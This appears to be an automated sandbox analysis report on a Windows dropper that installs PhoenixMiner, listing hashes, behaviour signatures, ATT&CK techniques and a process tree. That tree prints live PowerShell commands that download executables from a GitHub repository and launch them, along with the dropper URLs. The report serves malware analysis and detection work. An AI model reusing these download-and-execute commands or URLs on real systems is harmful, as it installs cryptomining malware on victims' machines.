Analysis

  • max time kernel
    140s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-09-2022 20:06

General

  • Target

    3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe

  • Size

    8.3MB

  • MD5

    9ed9ad87a1564fbb5e1b652b3e7148c8

  • SHA1

    0c001b7e9615cbc22eac2a324d8deb7eaf069ff7

  • SHA256

    3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89

  • SHA512

    e49e403a73ff1d10111d23cc70ae95ffae63abbc4a52cfc52c447ee9f15e76ab44f07d0f41e3b3e63a73a07e7748b8ac7ed8c997f1051a10ca5fad1dace4183a

  • SSDEEP

    196608:8eOr3LD6MZ+NL0j/YjNV4p9eLDZPhujwk8kAb+RWvqWd6qmgNSN:8TbnQYiN2eRPhSwhk8s46C4N

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/bild.exe

exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe

Signatures

  • Detectes Phoenix Miner Payload 5 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
    "C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3924
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:4616
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/jkh36/d/main/bild.exe,https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe -Destination lWr.exe,ck.exe;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2396
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command Start-Process lWr.exe; Start-Process ck.exe;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3708

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    b6deac3351c943410eafe90bc93687c8

    SHA1

    34ff10b6e186ff6f7b6f39ebb127ee137ade5589

    SHA256

    1775d61fb6831a2c572bb51d5772952ee13bbee68bde0367546bb04811a70f0a

    SHA512

    3e025c20277dff003fe09afa2a9014d2fe42761bec935f7d7eb917ddb5b8760d5e3bc643e81d28fa7352c398cbdffcc0dbb5302e7fc6b97969387a3ef313b880

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    3ce5123d2cf880b8de7c463668ec5136

    SHA1

    e918284c0fa3baf122a2db6507a59e05cb6eff25

    SHA256

    1983457a39c02365e1a9b889765b29c89d005d2891d9ee2e1df0386ec79bef20

    SHA512

    0a022c17c6db7657902ea796b8aecc73152fc1ac09664e3c5f2322bbc1e9a7401d968f3d98152c35d07af19ff9212cce181d110bbd68708b902e406de6dba6ac

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • memory/2396-144-0x0000000006D90000-0x0000000006DB2000-memory.dmp
    Filesize

    136KB

  • memory/2396-136-0x0000000002800000-0x0000000002836000-memory.dmp
    Filesize

    216KB

  • memory/2396-138-0x0000000004E00000-0x0000000004E22000-memory.dmp
    Filesize

    136KB

  • memory/2396-139-0x00000000050A0000-0x0000000005106000-memory.dmp
    Filesize

    408KB

  • memory/2396-140-0x00000000057D0000-0x0000000005836000-memory.dmp
    Filesize

    408KB

  • memory/2396-141-0x0000000005DD0000-0x0000000005DEE000-memory.dmp
    Filesize

    120KB

  • memory/2396-142-0x0000000006340000-0x00000000063D6000-memory.dmp
    Filesize

    600KB

  • memory/2396-143-0x00000000062D0000-0x00000000062EA000-memory.dmp
    Filesize

    104KB

  • memory/2396-135-0x0000000000000000-mapping.dmp
  • memory/2396-145-0x0000000007420000-0x00000000079C4000-memory.dmp
    Filesize

    5.6MB

  • memory/2396-146-0x0000000006FE0000-0x0000000006FF4000-memory.dmp
    Filesize

    80KB

  • memory/2396-137-0x0000000005130000-0x0000000005758000-memory.dmp
    Filesize

    6.2MB

  • memory/3708-147-0x0000000000000000-mapping.dmp
  • memory/3708-150-0x00000000078F0000-0x0000000007922000-memory.dmp
    Filesize

    200KB

  • memory/3708-151-0x000000006FAD0000-0x000000006FB1C000-memory.dmp
    Filesize

    304KB

  • memory/3708-152-0x00000000078D0000-0x00000000078EE000-memory.dmp
    Filesize

    120KB

  • memory/3708-153-0x0000000008A20000-0x000000000909A000-memory.dmp
    Filesize

    6.5MB

  • memory/3708-154-0x0000000007AF0000-0x0000000007AFA000-memory.dmp
    Filesize

    40KB

  • memory/3708-155-0x0000000007C70000-0x0000000007C7E000-memory.dmp
    Filesize

    56KB

  • memory/3708-156-0x0000000007CF0000-0x0000000007D0A000-memory.dmp
    Filesize

    104KB

  • memory/3708-157-0x0000000007CE0000-0x0000000007CE8000-memory.dmp
    Filesize

    32KB

  • memory/4616-132-0x0000000000000000-mapping.dmp